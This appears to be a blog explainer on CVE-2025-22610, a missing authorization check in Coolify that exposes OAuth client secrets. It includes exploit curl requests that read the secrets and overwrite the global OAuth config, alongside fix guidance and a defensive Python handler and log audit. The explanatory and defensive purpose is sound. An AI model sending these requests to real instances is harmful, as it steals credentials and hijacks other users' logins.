CVE-2025-22610 - Unauthorized Access to OAuth Secrets in Coolify (Explained and Exploited)

Coolify is an open-source and self-hostable platform that helps developers manage servers, applications, and databases—kind of like your all-in-one digital Swiss Army knife. But up until version 4.0.0-beta.361, Coolify had a big security hole. Any logged-in user—even those with the lowest level of access—could read and change the global OAuth configuration. This included very sensitive information: the Client ID and, worse, the Client Secret for all custom OAuth providers!

Sounds scary? Let’s break it down step by step, including how this happened, how it can be exploited, and how you can protect yourself.

What is CVE-2025-22610?

CVE-2025-22610 is a critical security flaw in Coolify (prior to 4.0.0-beta.361) where authorization checks were missing. Any authenticated user could:

- See the client ID and the sensitive client secret for every custom OAuth provider.

- Modify these settings, changing the identity/authentication flows for all other users.

Technical Details of the Vulnerability

This problem boils down to missing authorization. The API endpoint responsible for managing OAuth configurations simply didn’t check if the requesting user had admin rights or special permissions.

Suppose a Coolify instance is running on https://coolify.my-company.com. Any user (even a basic one) logged into their account could fire a request to an endpoint like:

GET /api/v1/settings/oauth

And Coolify would respond with the entire OAuth configuration—including secrets.

Here’s what a request and response might look like:

GET /api/v1/settings/oauth
Authorization: Bearer <valid-user-token>

And the response (simplified):

{
  "providers": [
    {
      "name": "GitHub",
      "clientId": "xxxxxxxxxxxxxx",
      "clientSecret": "super-secret-abcdefg"
    },
    ...
  ]
}

This *should* only be available to high-trust admins. Instead, everyone with an account could see it.

Exploiting CVE-2025-22610: A Step-by-Step Example

Disclaimer: This is for educational purposes only. Never attack systems you don't own or have explicit permission to test.

What you need: access to the web UI or the API via your browser or curl.

Let’s say I’m bob@company.com with minimal rights.

1. Log In and Grab Your Session Token

Use browser dev tools or curl to get your session token.

2. Send the Vulnerable API Request

curl -X GET https://coolify.my-company.com/api/v1/settings/oauth \
  -H "Authorization: Bearer <your-access-token>"

3. Read All the Secrets

The response will include JSON with clientSecret values for every custom OAuth provider. With this info, you could impersonate the OAuth app elsewhere or sabotage authentication flows.

4. (Optional) Modify Global OAuth Config

You could even update the global config! Here’s how you’d change the client secret for the GitHub provider:

curl -X PATCH https://coolify.my-company.com/api/v1/settings/oauth \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <your-access-token>" \
  -d '{"providers":[{"name":"GitHub","clientId":"newid","clientSecret":"hacked-secret"}]}'

Every login using GitHub (via OAuth) would now break—or route through your secret.

Why This Is So Dangerous

- Secrets Leak: OAuth client secrets are as sensitive as database passwords. With these, attackers can register their own apps or phish users.

- Wide Access: Any authenticated user could do this.

- Config Tampering: Attackers could break access for everyone, or even redirect logins to their own infrastructure.

The Fix: Upgrade to Coolify 4.0.0-beta.361 or Later

The developers fixed this in version 4.0.0-beta.361. Now, only proper admins can access and modify OAuth secrets.

If you run Coolify, upgrade now. Secrets for your OAuth providers may already have been leaked—rotate any exposed credentials as a precaution.
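To make the root cause and the fix concrete, here is an added example (not Coolify's code) that models the endpoint as a tiny handler: the pre-fix version hands the full config to any authenticated account, the hardened version adds the admin check on both read and write, and a small log audit finds the non-admin hits you would look for when deciding which provider secrets to rotate. The endpoint path, the role model, the sample config and the log format are all assumptions constructed for this example.

```python
"""Added example, not Coolify's code: the missing authorization check behind
CVE-2025-22610 as a tiny handler beside its hardened form, plus a log audit
for the post-upgrade check.  Endpoint path, role model and log format are
assumptions, not taken from Coolify's source."""

ENDPOINT = "/api/v1/settings/oauth"          # path as used on this page
ADMINS = {"alice@company.com"}                # constructed role assignment

# Constructed sample configuration; the secret is an obvious placeholder.
OAUTH_CONFIG = {"providers": [{"name": "GitHub", "clientId": "gh-client-id",
                               "clientSecret": "PLACEHOLDER-SECRET"}]}

def get_oauth_vulnerable(user: str) -> tuple:
    # Pre-fix behaviour: the caller is authenticated, so the full config is
    # returned; nothing asks whether this account is allowed to see secrets.
    return 200, OAUTH_CONFIG

def get_oauth_fixed(user: str) -> tuple:
    # Authentication says who the caller is; authorization decides what they
    # may do.  Non-admins get an HTTP-style 403 and no body.
    if user not in ADMINS:
        return 403, None
    return 200, OAUTH_CONFIG

def patch_oauth_fixed(user: str, providers: list) -> tuple:
    # The write path needs the same check, or config tampering stays possible.
    if user not in ADMINS:
        return 403, None
    OAUTH_CONFIG["providers"] = providers
    return 200, OAUTH_CONFIG

# Constructed access-log lines: "<timestamp> <email> <method> <path> <status>".
SAMPLE_LOG = """\
2025-01-20T10:00:00Z alice@company.com GET /api/v1/settings/oauth 200
2025-01-20T10:05:00Z bob@company.com GET /api/v1/settings/oauth 200
2025-01-20T10:06:00Z bob@company.com PATCH /api/v1/settings/oauth 200
2025-01-20T10:07:00Z bob@company.com GET /api/v1/servers 200
"""

def suspicious_oauth_access(log: str, admins: set) -> list:
    """Successful hits on the OAuth settings endpoint by non-admin accounts.
    On a pre-fix instance each one is a read or write of the client secrets,
    so any match means the affected providers' credentials should be rotated."""
    hits = []
    for line in log.splitlines():
        ts, user, method, path, status = line.split()
        if path == ENDPOINT and status == "200" and user not in admins:
            hits.append((ts, user, method))
    return hits
```

Running `suspicious_oauth_access(SAMPLE_LOG, ADMINS)` on the constructed log returns the two entries for the non-admin account, while alice's admin access and bob's unrelated request are ignored.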

References

- Original GitHub Advisory (GHSA-pwxx-8pw2-8c3g)
- NPM Advisory Database: CVE-2025-22610
- Coolify Releases

Fix: Upgrade, rotate secrets, audit user access.

If you're using Coolify, update ASAP and check for any suspicious account activity. Stay safe! 🚨


*Exclusive analysis by ChatGPT. Please credit if sharing or quoting.*

Timeline

Published on: 01/24/2025 17:15:15 UTC